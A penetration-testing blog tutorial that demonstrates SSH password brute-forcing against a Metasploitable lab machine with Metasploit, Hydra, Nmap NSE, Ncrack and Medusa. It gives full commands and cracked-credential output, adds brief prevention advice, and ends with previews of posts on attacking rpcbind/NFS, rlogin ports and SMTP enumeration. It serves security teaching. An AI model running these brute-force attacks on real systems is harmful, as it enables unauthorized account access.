Skip to main content
Method 1::

Metasploit

The first method we will try out today involves one of Metasploit's auxiliary scanners. First, start the PostgreSQL database with the following command.
service postgresql start
Now, we can fire up Metasploit by typing msfconsole in the terminal. You should see "msf" appear, though, for me, it's "msf5" since I'm using the most recent version, Metasploit 5, which can be upgraded by running the latest version of Kali. It's always a good idea to stay updated in order to take advantage of the latest exploits and tools. Here is the command I use to update:
apt-get update && apt-get dist-upgrade
Next, after being greeted by the welcome banner for msfconsole, we can find the appropriate module with the search command.
search ssh
Matching Modules
================
Name                                                        Disclosure Date  Rank       
   ----                                                        ---------------  ----     
   auxiliary/dos/windows/ssh/sysax_sshd_kexchange              2013-03-17       normal     
   auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                                    normal    
   auxiliary/fuzzers/ssh/ssh_version_15                                         normal     
   auxiliary/fuzzers/ssh/ssh_version_2                                          normal    
   auxiliary/fuzzers/ssh/ssh_version_corrupt                                    normal     
   auxiliary/scanner/http/cisco_firepower_login                                 normal    
   auxiliary/scanner/http/gitlab_user_enum                     2014-11-21       normal     
   auxiliary/scanner/ssh/apache_karaf_command_execution        2016-02-09       normal     
   auxiliary/scanner/ssh/detect_kippo                                           normal     
   auxiliary/scanner/ssh/eaton_xpert_backdoor                  2018-07-18       normal     
   auxiliary/scanner/ssh/fortinet_backdoor                     2016-01-09       normal     
   auxiliary/scanner/ssh/juniper_backdoor                      2015-12-20       normal     
   auxiliary/scanner/ssh/karaf_login                                            normal     
   auxiliary/scanner/ssh/libssh_auth_bypass                    2018-10-16       normal     
   auxiliary/scanner/ssh/ssh_enumusers                                          normal     
   auxiliary/scanner/ssh/ssh_identify_pubkeys                                   normal     
   auxiliary/scanner/ssh/ssh_login                                              normal     
   auxiliary/scanner/ssh/ssh_login_pubkey                                       normal     
   auxiliary/scanner/ssh/ssh_version                                        
use auxiliary/scanner/ssh/ssh_login
Then we can type options to display the available settings for the scanner
options
Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        
   BRUTEFORCE_SPEED  5                yes       
   DB_ALL_CREDS      false            no        
   DB_ALL_PASS       false            no       
   DB_ALL_USERS      false            no       
   PASSWORD                           no       
   PASS_FILE                          no        
   RHOSTS                             yes      
   RPORT             22               yes       
   STOP_ON_SUCCESS   false            yes      
   THREADS           1                yes      
   USERNAME                           no        
   USERPASS_FILE                      no        
   USER_AS_PASS      false            no        
   USER_FILE                          no       
   VERBOSE           false            yes

We need to set a few things in order for this to work properly. First, RHOSTS is the IP address of our target.
set rhosts 172.16.1.102
rhosts => 172.16.1.102
Next, STOP_ON_SUCCESS will stop after finding valid credentials.
set stop_on_success true
stop_on_success => true
Then, USER_FILE is a list of usernames.
set user_file users.txt
user_file => users.txt
And PASS_FILE is a list of passwords.
set pass_file passwords.txt
pass_file => passwords.txt
Finally, there's VERBOSE, which will display all attempts.
set verbose true
verbose => true

run
[-] 172.16.1.102:22 - Failed: 'user:password'
[-] 172.16.1.102:22 - Failed: 'user:Password123'
[-] 172.16.1.102:22 - Failed: 'user:msfadmin'
[-] 172.16.1.102:22 - Failed: 'user:admin'
[-] 172.16.1.102:22 - Failed: 'user:default'
[-] 172.16.1.102:22 - Failed: 'user:root'
[-] 172.16.1.102:22 - Failed: 'user:toor'
[-] 172.16.1.102:22 - Failed: 'user:hello'
[-] 172.16.1.102:22 - Failed: 'user:welcome'
[-] 172.16.1.102:22 - Failed: 'user:hunter2'
[-] 172.16.1.102:22 - Failed: 'msfadmin:password'
[-] 172.16.1.102:22 - Failed: 'msfadmin:Password123'
[+] 172.16.1.102:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) 
gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),
29(audio),30(dip),44(video),46(plugdev),
107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux
 metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (172.16.1.100:37615 -> 
172.16.1.102:22) at 2019-02-26 15:06:58 -0600
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Since we set the verbose option, we can see all the attempts as they take place. Depending on the number of username and password combinations, this can take quite some time to run.
When valid credentials are found, a success message is displayed and a command shell is opened. It does not automatically drop us in, though, so we can display the current active sessions with the sessions command.
sessions
Active sessions
===============

  Id  Name  Type         Information                                  
  1         shell linux  SSH msfadmin:msfadmin (172.16.1.102:22) 
sessions -i 1
] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),
20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),
119(sambashare),1000(msfadmin)
Now we are connected to the target via SSH and can run commands like normal.

Method 2::
Hydra

The next tool we will use is Hydra, a powerful login cracker which is very fast and supports a number of different protocols. To show the help and some basic usage options, simply type hydra in the terminal. (Note, if you were previously in the msf console, make sure you cd out of it before using Hydra.)hydra
hydra -l root -P Path/to/dictionary/wordlist.txt X.X.X.X ssh

  1. The -L flag, which specifies a list of login names.
  2. The -P flag, which specifies a list of passwords.
  3. ssh://172.16.1.102 — our target and protocol.
  4. The -t flag set to 4, which sets the number of parallel tasks to run. 

After a period of time, it will complete and show us the number of successful logins found.


Method 3:
Nmap Scripting Engine

The last method of brute forcing SSH credentials we will try out today
involves the use of the Nmap Scripting Engine. NSE contains a script
which will attempt to brute-force all possible combinations of a
username and password pair. To perform this attack, we can run a simple
Nmap scan from a fresh terminal just like before, but with a few extra
 options tacked on:

    --script ssh-brute specifies the script to use.
    --script-args will set the arguments for the script, separated by a comma.
    userdb=users.txt is the list of usernames we wish to use.
    passdb=passwords.txt is the list of passwords we wish to use.

Now, we are ready to start the scan: 


nmap 172.16.1.102 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 15:17 CST
NSE will display the brute-force attempts and which credentials are being tried. Be patient — depending on the number of usernames and passwords being used, this can take some time.
NSE: [ssh-brute] Trying username/password pair: user:user
NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
NSE: [ssh-brute] Trying username/password pair: admin:admin
NSE: [ssh-brute] Trying username/password pair: root:root
NSE: [ssh-brute] Trying username/password pair: john:john
NSE: [ssh-brute] Trying username/password pair: default:default
NSE: [ssh-brute] Trying username/password pair: support:support
NSE: [ssh-brute] Trying username/password pair: service:service
NSE: [ssh-brute] Trying username/password pair: adam:adam
NSE: [ssh-brute] Trying username/password pair: admin:password
NSE: [ssh-brute] Trying username/password pair: root:password
NSE: [ssh-brute] Trying username/password pair: john:password
NSE: [ssh-brute] Trying username/password pair: default:password
NSE: [ssh-brute] Trying username/password pair: support:password
NSE: [ssh-brute] Trying username/password pair: adam:password
NSE: [ssh-brute] Trying username/password pair: admin:Password123
NSE: [ssh-brute] Trying username/password pair: root:Password123
NSE: [ssh-brute] Trying username/password pair: john:Password123
NSE: [ssh-brute] Trying username/password pair: default:Password123

...
After a while, the scan will finish and a report will be shown in the terminal.
Nmap scan report for 172.16.1.102
Host is up (0.0011s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute:
|   Accounts:
|     user:user - Valid credentials
|     msfadmin:msfadmin - Valid credentials
|     service:service - Valid credentials
|_  Statistics: Performed 66 guesses in 124 seconds, average tps: 0.5
MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 147.59 seconds
Above, we can see it discovered three valid login credentials. This script is useful because it will iterate through all possible pairs of usernames and passwords, which will sometimes yield more results.

Method 4:
NCRACK

~# ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Method 5::

medusa
medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

How to Prevent SSH Brute-Forcing

The reality is that if you have a server facing the internet, there are going to be loads of SSH brute-force attempts daily, many of which are automated. But don't fret, there are some simple solutions to help protect against this and cut down on the number of login attempts.

Perhaps one of the easiest things to do is change the port number which SSH operates on. Although this will dissuade the most rudimentary brute-force attempts, it is trivial to scan for SSH running on alternate ports.

A better method is to implement a service like Fail2ban, DenyHosts, or iptables to block brute-force attempts at the host level. This, combined with using private key authentication instead of passwords, will put you out of the reach of most attackers. If password-based authentication is absolutely necessary, use strong passwords and follow best practices.


Comments

Post a Comment

Popular posts from this blog

exploit rpcbind

                            exploit rpcbind with nfs What is nfs?     Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems in 1984,allowing a user on a client computer to access files over a network in a manner similar to how local storage is accessed. NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system. The Network File System is an open standard defined in RFCs, allowing anyone to implement the protocol. What is rpcbind?     The rpcbind utility maps RPC services to the ports on which they listen. RPC processes notify rpcbind when they start, registering the ports they are listening on and the RPC program numbers they expect to serve. The client system then contacts rpcbind on the server with a particular RPC program number. The rpcbind service redirects the client to the proper port number so it can communicate with the requested service. Because RPC-based services
Post a Comment
Read more

Exploit and connect to port 512 ,513, and 514

               Exploit and connect to port 512 ,513, and 514 ༄ Unix Basics      TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured       to allow remote access from any host (a standard ".rhosts + +" situation).       To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and      run the following command as your local root user. If you are prompted for an SSH key,      this means the rsh-client tools have not been installed and Ubuntu is defaulting to       using  SSH. 🔂 Step-1:               First type "nmap -v <victim ip>" 🔄 Step-2:               type "rlogin  -l <user account> <ip address of victim>                                                                          by Er. SANJAY KUMAR                                                                                                            sanjayyadav11210@gmail.com
Post a Comment
Read more

Exploit Smtp service port 25

                          Exploit SMTP service port 25   ✍️ Total 4 Ways we can exploit Smtp service ✍️ Type  -1 --> metasploit step -1 : Type msfconsole in terminal the it will open metasploit step - 2 type - search smtp step  3 : find auxiliary/scanner/smtp/smtp_enum then use it by use command  ex  msf> use auxiliary/scanner/smtp/smtp_enum   step  4 : Show options -- for requirement identity step  5 : set attribute using set command. ex set rhost <rhostip> Step 6 : exploit/run it using exploit command.                                                                             by Er. Sanjay Kumar ✍️ Type  -2 --> smtp-user-enum smtp-user-enum smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN, and RCPT TO commands. It could be adapted to work against other vu
Post a Comment
Read more